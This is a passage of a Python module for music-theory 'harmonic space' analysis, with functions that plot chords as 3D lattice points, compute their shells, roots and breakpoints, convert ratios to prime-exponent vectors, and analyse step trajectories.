[c[i.lower()] for i in colors]\n if np.all(octaves == None):\n octaves = np.repeat(0, len(primes))\n if np.all(draw_points == None):\n segments = get_segments(pts)\n else:\n segments = get_segments(np.concatenate((pts, draw_points)))\n\n labels = get_ratios(pts, primes, octaves, oct_generalized)\n fig = plt.figure(figsize=[8, 6])\n ax = mplot3d.Axes3D(fig, elev=elev, azim=azim)\n ax.set_axis_off()\n\n min = np.min(pts)\n if min > range_override[0]:\n min = range_override[0]\n max = np.max(pts)\n if max < range_override[1]:\n max = range_override[1]\n\n\n if origin == True:\n quiver_min = origin_range[0]\n quiver_max = origin_range[1]\n q_diff = quiver_max - quiver_min\n if max < quiver_max:\n max = quiver_max\n if min > quiver_min:\n min = quiver_min\n x, y, z = np.array([[quiver_min, 0, 0],[0, quiver_min, 0],[0, 0, quiver_min]])\n u, v, w = np.array([[q_diff, 0, 0],[0, q_diff, 0],[0, 0, q_diff]])\n ax.quiver(x, y, z, u, v, w, arrow_length_ratio=0.1, color=\"black\", zorder=-1)\n for tick in range(quiver_min+1, quiver_max):\n a = [-0.0625, 0.0625]\n b = [0, 0]\n c = [tick, tick]\n ax.plot(a, b, c, color='black')\n ax.plot(b, a, c, color='black')\n ax.plot(a, c, b, color='black')\n ax.plot(c, a, b, color='black')\n ax.plot(b, c, a, color='black')\n ax.plot(c, b, a, color='black')\n\n\n if root_layout == True:\n for pt in pts:\n ax.plot([0, pt[0]], [0, pt[1]], [0, pt[2]], color='green')\n ax.plot([pt[0], pt[0]], [0, pt[1]], [0, pt[2]], color='green')\n ax.plot([0, pt[0]], [pt[1], pt[1]], [0, pt[2]], color='green')\n ax.plot([0, pt[0]], [0, pt[1]], [pt[2], pt[2]], color='green')\n\n xyz = [pts[:, 0], pts[:, 1], pts[:, 2]]\n for i, pt in enumerate(pts):\n ax.scatter(pt[0], pt[1], pt[2], color=colors[i], depthshade=False,\n s=int(60 * dot_size))\n if draw_point_visible==True:\n for i, pt in enumerate(draw_points):\n ax.scatter(pt[0], pt[1], pt[2], color=c[draw_color],\n depthshade=False, s=int(60 * dot_size))\n if ratios == True:\n for i, pt in enumerate(pts):\n ax.text(pt[0] - 0.15, pt[1] + 0.25, pt[2], labels[i], c='black',\n horizontalalignment='right', size='large')\n for seg in segments:\n ax.plot(seg[0], seg[1], seg[2], color=connect_color, alpha=opacity, lw=connect_size)\n\n ax.set_xlim3d([min, max])\n ax.set_ylim3d([min, max])\n ax.set_zlim3d([min, max])\n plt.savefig(path + '.' + file_type, transparent=transparent)\n plt.close(fig)\n\n if legend == True:\n\n fig = plt.figure(figsize=[8, 6])\n ax = mplot3d.Axes3D(fig, elev=elev, azim=azim)\n x_arrow = Arrow3D([-.005, 0.25], [0, 0], [0, 0], mutation_scale=20, lw=1, arrowstyle='-|>', color='black')\n y_arrow = Arrow3D([0, 0], [-0.01, 0.5], [0, 0], mutation_scale=20, lw=1, arrowstyle='-|>', color='black')\n z_arrow = Arrow3D([0, 0], [0, 0], [-0.01, 0.35], mutation_scale=20, lw=1, arrowstyle='-|>', color='black')\n ax.add_artist(x_arrow)\n ax.add_artist(y_arrow)\n ax.add_artist(z_arrow)\n ratios = primes * (2.0 ** octaves)\n\n ax.text(0.25, 0, 0, Fraction(ratios[0]), color='black', size=4 * dot_size)\n ax.text(0, 0.5, -0.03, Fraction(ratios[1]), color='black', size=4 * dot_size)\n z = ax.text(0.03, 0, 0.3, Fraction(ratios[2]), color='black', size=4 * dot_size)\n ax.set_axis_off()\n plt.savefig(path + '_legend.' 
+ file_type, transparent=transparent)\n plt.close()\n\n\n\n\n\ndef make_shell_plot(shell, pts, primes, path, octaves = None, draw_points = None,\n oct_generalized = False, dot_size=1, colors=None, ratios=True,\n origin=False, origin_range = [-2, 3], get_ax=False, legend=True,\n range_override=[0, 0], transparent=False, shell_color='grey',\n point_color='black', draw_point_visible=False, connect_size=1,\n shell_dot_size=None, angles=True):\n if shell_dot_size == None:\n shell_dot_size = dot_size\n c_ = matplotlib.colors.get_named_colors_mapping()\n if np.all(colors == None):\n colors = ['black' for i in range(len(pts))]\n else:\n colors = [c_[i.lower()] for i in colors]\n if np.all(octaves == None):\n octaves = np.repeat(0, len(primes))\n if np.all(draw_points == None):\n point_segments = get_segments(pts)\n shell_segments = get_segments(shell)\n else:\n point_segments = get_segments(np.concatenate((pts, draw_points)))\n shell_segments = get_segments(shell)\n labels = get_ratios(pts, primes, octaves, oct_generalized)\n fig = plt.figure(figsize=[8, 6])\n ax = mplot3d.Axes3D(fig, elev=13, azim=-52)\n ax.set_axis_off()\n\n min = np.min(shell)\n if min > range_override[0]:\n min = range_override[0]\n max = np.max(shell)\n if max < range_override[1]:\n max = range_override[1]\n\n\n if origin == True:\n quiver_min = origin_range[0]\n quiver_max = origin_range[1]\n q_diff = quiver_max - quiver_min\n if max < quiver_max:\n max = quiver_max\n if min > quiver_min:\n min = quiver_min\n x, y, z = np.array([[quiver_min, 0, 0],[0, quiver_min, 0],[0, 0, quiver_min]])\n u, v, w = np.array([[q_diff, 0, 0],[0, q_diff, 0],[0, 0, q_diff]])\n ax.quiver(x, y, z, u, v, w, arrow_length_ratio=0.1, color=\"black\", zorder=-1)\n for tick in range(quiver_min+1, quiver_max):\n a = [-0.0625, 0.0625]\n b = [0, 0]\n c = [tick, tick]\n ax.plot(a, b, c, color='black')\n ax.plot(b, a, c, color='black')\n ax.plot(a, c, b, color='black')\n ax.plot(c, a, b, color='black')\n ax.plot(b, c, a, color='black')\n ax.plot(c, b, a, color='black')\n\n if angles == True and len(pts) > 1:\n combs = [i for i in itertools.combinations(range(len(pts)), 2)]\n for i, indices in enumerate(combs):\n arc = draw_arc(pts[indices[0]], pts[indices[1]], 0.2 + 0.05 *i)\n ax.scatter(arc[:,0], arc[:, 1], arc[:, 2], color='green', s=1)\n for pt in pts:\n ax.plot([0, pt[0]], [0, pt[1]], [0, pt[2]], color='blue', lw=connect_size)\n\n for i, pt in enumerate(shell):\n\n ax.scatter(pt[0], pt[1], pt[2], color=c_[shell_color], depthshade=False,\n s=int(60 * shell_dot_size))\n for seg in shell_segments:\n ax.plot(seg[0], seg[1], seg[2], color=c_[shell_color], alpha=0.5, lw=connect_size)\n\n for i, pt in enumerate(pts):\n if i == 0:\n # previously color here was hard coded to red\n ax.scatter(pt[0], pt[1], pt[2], color=c_[point_color], depthshade=False,\n s=int(60 * dot_size))\n else:\n ax.scatter(pt[0], pt[1], pt[2], color=c_[point_color],\n depthshade=False, s=int(60 * dot_size))\n\n for seg in point_segments:\n ax.plot(seg[0], seg[1], seg[2], color=c_[point_color], alpha=0.5, lw=10)\n\n if ratios == True:\n for i, pt in enumerate(pts):\n ax.text(pt[0] - 0.15, pt[1] + 0.25, pt[2], labels[i], c='black',\n horizontalalignment='right', size='large')\n\n\n ax.set_xlim3d([min, max])\n ax.set_ylim3d([min, max])\n ax.set_zlim3d([min, max])\n plt.savefig(path + '.pdf', transparent=transparent)\n plt.close(fig)\n\ndef cartesian_product(*arrays):\n la = len(arrays)\n dtype = np.result_type(*arrays)\n arr = np.empty([len(a) for a in arrays] + [la], dtype=dtype)\n for i, a 
in enumerate(np.ix_(*arrays)):\n arr[..., i] = a\n return arr.reshape(-1, la)\n\ndef is_fully_connected(points):\n \"\"\"Returns True if all points are exactly one unit away from at least one\n other point; else returns False\"\"\"\n full_truth = []\n for point in points:\n other_points = points[np.invert((points == point).all(axis=1))]\n truth_array = []\n for op in other_points:\n one = np.count_nonzero(np.abs(point - op) == 1) == 1\n zero = np.count_nonzero(point - op == 0) == 2\n truth = one and zero\n truth_array.append(truth)\n full_truth.append(np.any(truth_array))\n return np.all(full_truth)\n\ndef flatten(iterable):\n return list(itertools.chain.from_iterable(iterable))\n\ndef sub_branches(points):\n \"\"\"Given the points that make up a chord, returns the list of all subsets of\n those points that form branches. If lens == true, the returned array is\n nested into groups by chord size, in decreasing order.\n \"\"\"\n out = []\n size = len(points)\n while True:\n potential_indexes = np.array([i for i in itertools.combinations(range(len(points)), size)])\n for pi in potential_indexes:\n if is_fully_connected(points[pi]):\n out.append(pi)\n size -= 1\n if size == 1:\n break\n sb = [points[i] for i in out]\n return sb\n\ndef unique_sub_branches(points, count=False):\n \"\"\"If given points, gets sub_branches, transfers all to ordinal, splits\n into groups based on length, and remove duplicates from each of those groups,\n before putting all unique sub branches back into an output array that is\n returned\"\"\"\n # TODO make this avoid getting the sub branches twice, by letting the input\n # be sub_branches or points.\n sb = [reorder_points(cast_to_ordinal(i)) for i in sub_branches(points)]\n lens = list(set([len(i) for i in sb]))[::-1]\n if count == True:\n sb_groups = [np.array([i for i in sb if len(i) == j]) for j in lens]\n usb_groups = [npi.unique(i, return_index=True, return_count=True) for i in sb_groups]\n usb = list(i[0] for i in usb_groups)\n idx = list(i[1] for i in usb_groups)\n cts = list(i[2] for i in usb_groups)\n\n all_matches = []\n ct = 0\n for l_i in range(len(sb_groups)):\n for unq in usb[l_i]:\n matches = []\n for i, sb in enumerate(sb_groups[l_i]):\n intersect = npi.intersection(unq, sb)\n if len(intersect) == len(unq):\n matches.append(ct + i)\n all_matches.append(matches)\n ct += len(sb_groups[l_i])\n return flatten(usb), all_matches\n else:\n usb_groups = [npi.unique(np.array([i for i in sb if len(i) == j])) for j in lens]\n usb = flatten(usb_groups)\n return usb\n\ndef get_transposition_shell(points):\n \"\"\"Given the points that make up a branch rooted at the origin, returns the\n points that make up its rotation shell.\"\"\"\n dims = np.shape(points)[-1]\n permutations = np.array([i for i in itertools.permutations(range(dims))])\n # print(np.shape(points))\n # print(np.shape(permutations))\n # try:\n # perms = points[:, permutations]\n # except:\n # print(points, permutations)\n # perms = points[0][:, permutations]\n perms = points[:, permutations]\n transpositions = perms.transpose((1, 0, *range(2, len(np.shape(perms)))))\n all_points = np.concatenate(transpositions)\n unique = np.unique(all_points, axis=0)\n return unique\n\ndef get_multipath_shell(points):\n for point in points:\n multipath = cartesian_product(*[np.arange(i+1) for i in point])\n if 'multipath_shell' not in locals():\n multipath_shell = multipath\n else:\n multipath_shell = np.vstack((multipath_shell, multipath))\n return np.unique(multipath_shell, axis=0)\n\ndef 
get_transpositions(points):\n points = np.array(points)\n dims = np.shape(points)[-1]\n permutations = np.array([i for i in itertools.permutations(range(dims))])\n perms = points[:, permutations]\n transpositions = perms.transpose((1, 0, *range(2, len(np.shape(perms)))))\n return transpositions\n\ndef get_stability(points):\n \"\"\"The average of the proportion of rotations in which each unique\n position is occupied\"\"\"\n rots = get_transpositions(points)\n shape = np.shape(rots)\n pos_in_rots = np.unique(rots, axis=1)\n pos_tot = npi.union(*[i for i in rots])\n all_pos_occurences = pos_in_rots.reshape((np.int(np.size(pos_in_rots) / 3), 3))\n pos_tot, counts = np.unique(all_pos_occurences, axis=0, return_counts=True)\n out = np.round(np.mean(counts) / 6, 2)\n return out\n\ndef get_loops(points):\n \"\"\"Returns the number of loops in the structure of the chord\"\"\"\n ct = 0\n diffs = points[:, None] - points[None, :]\n diffs = np.linalg.norm(diffs, axis=2)\n\n one_inds = np.array(np.nonzero(diffs == 1)).T\n root_two_inds = np.array(np.nonzero(diffs == np.sqrt(2))).T\n\n filtered_root_two_inds = []\n for i in root_two_inds:\n truth = True\n for j in filtered_root_two_inds:\n if np.all(i[::-1] == j):\n truth = False\n if truth:\n filtered_root_two_inds.append(i)\n filtered_root_two_inds = np.array(filtered_root_two_inds)\n\n for i in filtered_root_two_inds:\n ones_a = one_inds[np.nonzero(one_inds[:,0] == i[0])]\n ones_b = one_inds[np.nonzero(one_inds[:,0] == i[1])]\n points_a = points[ones_a[:, 1]]\n points_b = points[ones_b[:, 1]]\n intersections = npi.intersection(points_a, points_b)\n if len(intersections) == 2:\n ct += 1\n return ct / 2\n\ndef get_complement_shell(points):\n \"\"\"Given the points that make up a branch rooted at the origin, returns the\n points that make up its complement shell.\"\"\"\n maxs = np.max(points, axis=0)\n complement_shell = np.array(((0, 0, 0))).reshape((1, 3))\n for point in points:\n shell = [np.array([k for k in range(i + 1)]) for i in point]\n shell = cartesian_product(*shell)\n complement_shell = np.concatenate((complement_shell, shell), axis=0)\n complement_shell = np.unique(complement_shell, axis=0)\n return complement_shell\n\ndef is_contained_by(point, container):\n \"\"\"Returns True if point is contained by container\"\"\"\n return np.all(point - container >= 0)\n\ndef containment_relationship(A, B):\n \"\"\"For two points, returns 0 if there is no containment relationship,\n 1 if A contains B, and 2 if B contains A.\"\"\"\n if is_contained_by(B, A):\n return 1\n elif is_contained_by(A, B):\n return 2\n else:\n return 0\n\ndef are_roots(points):\n \"\"\"Returns an array of boolean values assessing if each point is a root by\n testing if each point is contained by any of the other points.\"\"\"\n out = []\n points = np.array(points)\n for point in points:\n other_points = points[np.invert((points == point).all(axis=1))]\n truth_array = []\n for op in other_points:\n truth_array.append(is_contained_by(point, op))\n out.append(not np.any(np.array(truth_array)))\n return np.array(out)\n\ndef are_extremities(points):\n \"\"\"Returns an array of boolean values assessing if each point is an\n extremity by testing if each point contains any other points.\"\"\"\n out = []\n for point in points:\n other_points = points[np.invert((points == point).all(axis=1))]\n truth_array = []\n for op in other_points:\n truth_array.append(is_contained_by(op, point))\n out.append(not np.any(np.array(truth_array)))\n return np.array(out)\n\ndef 
are_root_breakpoints(points):\n \"\"\"Returns an array of boolean values assessing if each point is a root\n breakpoint by testing if it is contained by two roots, and is the simplest\n point contained by those two roots\"\"\"\n points = np.array(points)\n roots = points[are_roots(points)]\n combs = itertools.combinations(range(len(roots)), 2)\n out = np.zeros(len(points), dtype=bool)\n for comb in combs:\n potential_breakpoints = []\n for point in points:\n test_1 = is_contained_by(point, roots[comb[0]])\n test_2 = is_contained_by(point, roots[comb[1]])\n if test_1 and test_2:\n potential_breakpoints.append(point)\n potential_breakpoints = np.array(potential_breakpoints)\n if len(potential_breakpoints) > 1:\n sorts = np.argsort([sum(i) for i in potential_breakpoints])\n breakpoint = potential_breakpoints[sorts][0]\n elif len(potential_breakpoints) == 1:\n breakpoint = potential_breakpoints[0]\n elif len(potential_breakpoints) == 0:\n breakpoint = None\n for i, pt in enumerate(points):\n if str(breakpoint) == str(pt):\n out[i] = True\n return out\n\ndef are_extremity_breakpoints(points):\n \"\"\"Returns an array of boolean values assessing if each point is an extremity\n breakpoint by testing if it contains by two extremities, and is the most complex\n point that contains those two roots\"\"\"\n points = np.array(points)\n extremities = points[are_extremities(points)]\n combs = itertools.combinations(range(len(extremities)), 2)\n out = np.zeros(len(points), dtype=bool)\n for comb in combs:\n potential_breakpoints = []\n for point in points:\n test_1 = is_contained_by(extremities[comb[0]], point)\n test_2 = is_contained_by(extremities[comb[1]], point)\n if test_1 and test_2:\n potential_breakpoints.append(point)\n potential_breakpoints = np.array(potential_breakpoints)\n if len(potential_breakpoints) > 1:\n sorts = np.argsort([sum(i) for i in potential_breakpoints])\n breakpoint = potential_breakpoints[sorts][-1]\n elif len(potential_breakpoints) == 1:\n breakpoint = potential_breakpoints[0]\n elif len(potential_breakpoints) == 0:\n breakpoint = None\n for i, pt in enumerate(points):\n if str(breakpoint) == str(pt):\n out[i] = True\n return out\n\ndef unique_permutations(arr):\n return np.array(list(set(itertools.permutations(arr))))\n\ndef paths_to_point(point, root = [0, 0, 0]):\n \"\"\"Returns a list of sets of points outlining each of the possible paths\n between root and point. (Currently only for 3D)\"\"\"\n point = np.array(point)\n root = np.array(root)\n point = point - root\n num_of_paths = np.product(point + 1)\n increments_0 = np.repeat(0, point[0])\n increments_1 = np.repeat(1, point[1])\n increments_2 = np.repeat(2, point[2])\n increments = np.hstack((increments_0, increments_1, increments_2))\n inc_paths = unique_permutations(increments)\n paths = []\n for ip in inc_paths:\n path = np.zeros((len(ip) + 1, 3), dtype = int)\n for i, item in enumerate(ip):\n path[i+1:, item] += 1\n path += root\n paths.append(path)\n paths = np.array(paths)\n return paths\n\ndef cast_to_ordinal(points, verbose=False):\n # needs to be fixed, not discriminating enough!\n \"\"\"Given a list of harmonic space vectors, returns the collection cast to\n ordinal position. 
That is, with dimensions sorted firstly by max extent from\n origin, secondly by average extent in each dimension, and thirdly by order\n of extent in each dimension of point with furthest manhattan\n distance from origin.\"\"\"\n # TODO DOESN't work in more than 4 dimensions!!!\n\n mins = np.min(points, axis=0)\n points = points - mins\n origin = np.repeat(0, np.shape(points)[-1])\n dims = np.shape(points)[-1]\n\n avg = np.average(points, axis=0)\n avg_dup_indexes = indexes_of_duplicates(avg)\n if verbose and len(avg_dup_indexes) > 1:\n\n print('Potentially fatal: multiple avg dups!')\n print(points)\n if len(avg_dup_indexes) == 1:\n avg_dup_indexes = avg_dup_indexes[0]\n avg_order = np.argsort(-1 * avg)\n points = points[:, avg_order]\n\n maxs = np.max(points) - np.max(points, axis=0)\n avg_dup_maxs = indexes_of_duplicates(maxs)\n if verbose and len(avg_dup_maxs) > 1:\n print('Potentially fatal: multiple avg maxs!')\n print(points)\n if len(avg_dup_maxs) == 1:\n avg_dup_maxs = avg_dup_maxs[0]\n max_order = np.argsort(maxs)\n points = points[:, max_order]\n # print(avg_dup_indexes, avg_dup_maxs, '\\n\\n\\n')\n shared_dims = np.intersect1d(avg_dup_indexes, avg_dup_maxs)\n if verbose and len(shared_dims) > 2:\n print('Potentially fatal: shared dims greater than 2!')\n print(points, '\\n')\n if len(shared_dims) == 2 and dims > 2:\n dims = np.arange(np.shape(points)[-1])\n non_shared_dims = dims[np.invert(npi.contains(shared_dims, dims))]\n\n #discriminatory collection\n shared_dim_points = points[:, shared_dims]\n equal_filter = shared_dim_points[:,0] - shared_dim_points[:,1] == 0\n\n non_shared_dim_points = points[:, non_shared_dims]\n seperated_dup_inds = indexes_of_duplicates_2d(non_shared_dim_points)\n\n inverted_inds = []\n for dup_inds in seperated_dup_inds:\n combs = itertools.combinations(dup_inds, 2)\n for comb in combs:\n if np.all(shared_dim_points[comb[0]] == shared_dim_points[comb[1]][::-1]):\n for c in comb:\n inverted_inds.append(c)\n inverted_filter = npi.contains(np.array(inverted_inds), np.arange(len(points)))\n filter = np.invert(np.logical_or(equal_filter,inverted_filter))\n C_dis = points[filter]\n if len(C_dis > 0):\n mds = np.sum(C_dis, axis=1)\n max_mds = np.max(mds)\n # if np.count_nonzero(mds == max_mds) > 1:\n # print('Potentially fatal: shared max manhattan distances in C_dis')\n # print(mds)\n # print(C_dis)\n T_mmd = C_dis[np.argmax(mds)]\n dis_sorts = np.argsort(T_mmd[shared_dims])[::-1]\n sorts = dims[:]\n sorts[shared_dims] = dis_sorts\n sorts = np.argsort(sorts)\n points = points[:, sorts]\n return points\n\ndef indexes_of_duplicates(arr):\n \"\"\"Given a 1-d numpy array, arr, returns a list of numpy arrays each filled with\n the indexes of any items in arr that appear more than once.\"\"\"\n arr = np.array(arr)\n idx_sort = np.argsort(arr)\n sorted = arr[idx_sort]\n vals, idx_start, count = np.unique(sorted, return_counts=True, return_index=True)\n res = np.split(idx_sort, idx_start[1:])\n vals = vals[count > 1]\n res = filter(lambda x: x.size > 1, res)\n return list(res)\n\ndef indexes_of_duplicates_2d(arr):\n \"\"\"Given a 2-d numpy array, arr, returns a list of numpy arrays each filled with\n the indexes of any items in arr that appear more than once.\"\"\"\n arr = np.array(arr)\n unq = npi.unique(arr)\n out = [np.nonzero(npi.contains([u], arr))[0] for u in unq]\n out = [i for i in out if len(i) > 1]\n return out\n\ndef get_ordinal_sorts(points):\n \"\"\"Returns a sorting array that would cast a set of points to ordinal\n position. 
\"\"\"\n mins = np.min(points, axis=0)\n points = points - mins\n origin = np.repeat(0, np.shape(points)[-1])\n\n # index of max manhattan distance\n bc_origin = np.broadcast_to(origin, np.shape(points))\n manhattan_distance = cdist(bc_origin, points, metric='cityblock')\n max_md_index = np.argmax(manhattan_distance)\n max_md_order = np.argsort(points[max_md_index])[::-1]\n points = points[:, max_md_order]\n\n avg_order = np.argsort(-1 * np.average(points, axis=0))\n points = points[:, avg_order]\n max_order = np.argsort(np.max(points) - np.max(points, axis=0))\n points = points[:, max_order]\n return np.array((max_md_order, avg_order, max_order))\n\ndef reorder_points(points):\n \"\"\"Reorders points such that they are in a consistent order for testing for\n uniqueness against other sets of points.\"\"\"\n primes = np.array((2.0, 3, 5, 7, 11, 13, 17, 19))[:np.shape(points)[-1]]\n mult = np.product(primes ** points, axis=1)\n indexes = np.argsort(mult)\n return points[indexes]\n\ndef draw_arc(A, B, r = 0.25):\n A = np.where(A != 0, A / np.linalg.norm(A), A)\n B = np.where(B != 0, B / np.linalg.norm(B), B)\n crossed = np.cross(A, B)\n B_alt = np.cross(crossed, A)\n\n B_alt = np.where(B_alt != 0, B_alt / np.linalg.norm(B_alt), B_alt)\n theta_limit = np.arccos(np.dot(A, B))\n\n\n theta = np.repeat(np.linspace(0, theta_limit, 100), 3).reshape((100, 3))\n return r * (np.cos(theta) * A + np.sin(theta) * B)\n\ndef create_tree_edges(points):\n # make a list of tuples describing orthogonal connections\n # and make a list of containments, for dotted lines\n out = []\n for p, point in enumerate(points):\n for op, other_point in enumerate(points[p:]):\n if np.linalg.norm(point - other_point) == 1:\n if is_contained_by(point, other_point):\n out.append((p, op+p))\n else:\n out.append((op+p, p))\n # out = sorted(out, key=lambda x: x[0])\n return out\n\ndef plot_tree(points, path, type='root'):\n \"\"\"\n\n possible types: root, extremity, root_extremity, root_breakpoint,\n extremity_breakpoint,\"\"\"\n edges = create_tree_edges(points)\n G=nx.MultiDiGraph(size='2, 4')\n G.add_edges_from(edges)\n edge_order = []\n for i in itertools.chain.from_iterable(edges):\n if i not in edge_order: edge_order.append(i)\n edge_order = np.array(edge_order)\n colors = np.repeat(0, len(points))\n\n if type == 'root':\n colors = np.where(are_roots(points), 1, colors)\n colors = [['black', 'red'][i] for i in colors]\n elif type == 'extremity':\n colors = np.where(are_extremities(points), 1, colors)\n colors = [['black', 'mediumseagreen'][i] for i in colors]\n elif type == 'root_extremity':\n colors = np.where(are_roots(points), 1, colors)\n colors = np.where(are_extremities(points), 2, colors)\n colors = [['black', 'red', 'mediumseagreen'][i] for i in colors]\n elif type == 'root_breakpoint':\n colors = np.where(are_roots(points), 1, colors)\n colors = np.where(are_root_breakpoints(points), 2, colors)\n colors = [['black', 'red', 'mediumorchid'][i] for i in colors]\n elif type == 'extremity_breakpoint':\n colors = np.where(are_extremities(points), 1, colors)\n colors = np.where(are_extremity_breakpoints(points), 2, colors)\n colors = [['black', 'mediumseagreen', 'cornflowerblue'][i] for i in colors]\n\n colors = [colors[i] for i in edge_order]\n\n pos=graphviz_layout(G, prog='dot')\n plt.figure(figsize=[3, 4])\n nx.draw(G, pos, with_labels=False, arrows=False, node_color=colors)\n plt.savefig(path + '.pdf', transparent=True)\n plt.close()\n\ndef plot_basic_hsl(points, path, type='root'):\n \"\"\"\n\n possible types: root, 
extremity, root_extremity, root_breakpoint,\n extremity_breakpoint,\"\"\"\n colors = np.repeat(0, len(points))\n if type == 'root':\n colors = np.where(are_roots(points), 1, colors)\n colors = [['black', 'red'][i] for i in colors]\n elif type == 'extremity':\n colors = np.where(are_extremities(points), 1, colors)\n colors = [['black', 'mediumseagreen'][i] for i in colors]\n elif type == 'root_extremity':\n colors = np.where(are_roots(points), 1, colors)\n colors = np.where(are_extremities(points), 2, colors)\n colors = [['black', 'red', 'mediumseagreen'][i] for i in colors]\n elif type == 'root_breakpoint':\n colors = np.where(are_roots(points), 1, colors)\n colors = np.where(are_root_breakpoints(points), 2, colors)\n colors = [['black', 'red', 'mediumorchid'][i] for i in colors]\n elif type == 'extremity_breakpoint':\n colors = np.where(are_extremities(points), 1, colors)\n colors = np.where(are_extremity_breakpoints(points), 2, colors)\n colors = [['black', 'mediumseagreen', 'cornflowerblue'][i] for i in colors]\n else: print('Error: Unknown Type')\n primes = np.array((3, 5, 7))\n make_plot(points, primes, path, dot_size=2, colors=colors,\n ratios=False, range_override=[-1, 3], connect_color='black',\n connect_size=1, legend=False, transparent=True)\n\ndef get_factors(nr):\n \"\"\"Enumerates all factors of a given number.\"\"\"\n i = 2\n factors = []\n while i <= nr:\n if (nr % i) == 0:\n factors.append(i)\n nr = nr / i\n else:\n i = i + 1\n return factors\n\ndef get_hsv(nr, num_of_primes = 8):\n \"\"\"For a given number, returns its harmonic space vector.\"\"\"\n primes = np.array((2, 3, 5, 7, 11, 13, 17, 19))[:num_of_primes]\n hsv = np.zeros_like(primes)\n factors = np.array(get_factors(nr))\n unique, exponents = np.unique(factors, return_counts=True)\n for i, item in enumerate(unique):\n index = np.where(primes == item)\n hsv[index] = exponents[i]\n return hsv\n\ndef analyze(ratios, root = 1):\n ratios = [Fraction(ratio).limit_denominator(1000) for ratio in ratios]\n full_hsvs = np.array([get_hsv(f.numerator) - get_hsv(f.denominator) for f in ratios])\n octave_generalized = full_hsvs[:, 1:]\n primes = np.array((3, 5, 7, 11, 13, 17, 19))\n filter = np.where(np.any(octave_generalized.T != np.zeros(len(ratios)), axis=1))\n chord_primes = primes[filter]\n hsvs = octave_generalized[:, filter]\n shape = np.shape(hsvs)\n hsvs = np.reshape(hsvs, (shape[0], shape[2]))\n octs = full_hsvs[:, 0]\n trials = cartesian_product(*[np.arange(-4, 5) for i in range(len(chord_primes))])\n b_trials = np.expand_dims(trials, 1)\n b_trials_shape = np.shape(b_trials)\n b_trials = np.broadcast_to(b_trials, (b_trials_shape[0], len(hsvs), b_trials_shape[-1]))\n sum = np.sum(b_trials * hsvs, axis=2)\n possible_trials = trials[np.all(sum == octs, axis=1)]\n if len(possible_trials) == 0:\n print('No Dice!')\n oct_shifts = 'Cant find good octave shifts'\n elif len(possible_trials) == 1:\n oct_shifts = possible_trials[0]\n elif len(possible_trials) > 1:\n oct_shifts = possible_trials[np.argmin(np.sum(np.abs(possible_trials), axis=1))]\n\n return chord_primes, hsvs, oct_shifts\n\n# clasifiers\n\ndef containment_size(points, return_containment_index=True):\n combs = [i for i in itertools.combinations(range(len(points)), 2)]\n ct = 0\n for comb in combs:\n p1 = points[comb[0]]\n p2 = points[comb[1]]\n if is_contained_by(p1, p2) or is_contained_by(p2, p1):\n ct += 1\n if return_containment_index == False:\n return ct\n else:\n return ct, ct / len([i for i in combs])\n\n\n\ndef get_routes(points):\n \"\"\"Return the number 
of routes in a chord.\"\"\"\n # intersections + extremities + loops - 1\n counts=[]\n for pt in points:\n dists = points-pt\n count = np.count_nonzero(np.linalg.norm(points-pt, axis=1) == 1)\n counts.append(count)\n counts = np.array(counts)\n intersections = np.count_nonzero(counts > 2)\n extremities = np.count_nonzero(counts == 1)\n loops = get_loops(points)\n return intersections + extremities + loops - 1\n\ndef mean_root_distance(points):\n roots = points[are_roots(points)]\n combined_dist = 0\n for root in roots:\n\n # dist = cdist(np.zeros_like(root), root, metric='cityblock')\n dist = np.sum(root)\n combined_dist += dist\n return combined_dist / len(roots)\n\ndef mean_root_angle(points):\n roots = points[are_roots(points)]\n combs = [i for i in itertools.combinations(range(len(roots)), 2)]\n angle_sum = 0\n for comb in combs:\n A = roots[comb[0]]\n B = roots[comb[1]]\n dot_product = np.dot(A, B)\n mag_product = np.linalg.norm(A) * np.linalg.norm(B)\n angle_sum += np.arccos(dot_product/ mag_product)\n if len(roots) == 1:\n return angle_sum\n else:\n return angle_sum * 2 * math.factorial(len(roots) - 2) / math.factorial(len(roots))\n\n\n\n# trajectory utils\n# ________________\n\ndef ult_vector(trajectory):\n \"\"\"('Ultimate Vector') Returns the vector from the origin to the destination of the\n trajectory.\"\"\"\n return np.sum(trajectory, axis=0)\n\ndef traj_to_points(traj, unique=True, persistence=False):\n \"\"\"Convert a trajectory to the set of unique points it crosses, were it to\n start at the origin.\"\"\"\n origin = np.zeros(np.shape(traj)[-1], dtype=int)\n points = np.expand_dims(origin, 0)\n for step in traj:\n new_point = np.array([points[-1] + step])\n points = np.concatenate((points, new_point))\n\n unq, cts = npi.unique(points, return_count=True)\n if persistence == True:\n if unique == True:\n return unq, cts / np.sum(cts)\n else:\n filter = npi.indices(unq, points)\n return points, cts[filter]\n else:\n if unique == True:\n return npi.unique(points)\n else:\n return points\n\ndef traj_to_point_tuples(traj, root = None, offset = 0.1):\n \"\"\"Returns an array of tuples of the start and endpoint of each traj vector,\n pasted end-to-front.\"\"\"\n if np.all(root == None):\n root = np.zeros(np.shape(traj)[-1])\n steps = []\n for i, step in enumerate(traj):\n if i == 0:\n start = root\n else:\n start = np.ceil(steps[-1][1])\n end = start + step * (1 - offset)\n steps.append((start, end))\n return steps\n\n\n\n\ndef cast_traj_to_ordinal(traj):\n \"\"\"Reorders the axes of the trajectory such that the chord it generates\n is in ordinal position, except for being translated due to the origin.\"\"\"\n points = traj_to_points(traj)\n sorts = get_ordinal_sorts(points)\n traj = traj[:, sorts[0]]\n traj = traj[:, sorts[1]]\n traj = traj[:, sorts[2]]\n return traj\n\ndef get_directionality(trajectory):\n \"\"\"Returns the proportion of steps that point in the same direction as the\n ultimate vector, summed along each axis.\"\"\"\n uv = ult_vector(trajectory)\n mult = uv * trajectory\n return np.sum(np.sign(mult)) / len(mult)\n\ndef get_crossings(trajectory, return_counts=True):\n \"\"\"Returns all points that are visited at least twice.\"\"\"\n points = traj_to_points(trajectory, unique=False)\n unq, cts = npi.unique(points, return_count=True)\n if return_counts == False:\n return unq[cts>1]\n else:\n return unq[cts>1], cts[cts>1]\n\n# def get_persistence(trajectory):\n# \"\"\"Returns proportion of all points relative to total non-unique points\n# crossed. 
